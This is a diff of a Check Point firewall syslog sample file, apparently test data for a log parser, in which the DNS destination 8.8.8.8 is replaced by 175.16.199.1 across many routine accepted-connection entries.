 <134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"172.217.17.78"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"49956"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x2,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"216.58.211.99"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"41556"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501093"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56870"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501093"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56870"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x2,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"216.58.211.110"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"54412"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x3,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501093"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55908"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x3,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501093"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55908"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x4,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"172.217.17.142"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"56712"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x5,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"172.217.17.142"; log_delay:"1585501093"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"56714"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x6,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"172.217.17.142"; log_delay:"1585501093"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"56716"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x7,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"172.217.17.142"; log_delay:"1585501093"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"56718"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x3,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"15"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501093"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46625"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x3,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"15"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501093"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46625"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"16"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"172.217.17.67"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"59706"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x4,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"17"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501093"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37560"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x8,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"18"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501093"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59224"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x4,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"17"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501093"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37560"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x8,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"18"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501093"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59224"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x5,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"19"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"172.217.19.206"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"33986"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x6,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"20"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"172.217.19.194"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"55652"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"21"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501093"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41740"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"21"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501093"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41740"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"22"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"172.217.168.194"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38354"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:58:14Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a6,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501094"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46529"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:58:14Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a6,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501094"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46529"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:58:14Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a6,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"34.215.75.150"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37662"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:58:14Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a6,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"34.215.75.150"; log_delay:"1585501094"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37664"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:58:14Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a6,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"34.215.75.150"; log_delay:"1585501094"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37666"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:58:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a7,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"93.184.220.29"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"46676"; service:"80"; service_id:"http"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:58:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a7,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53632"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
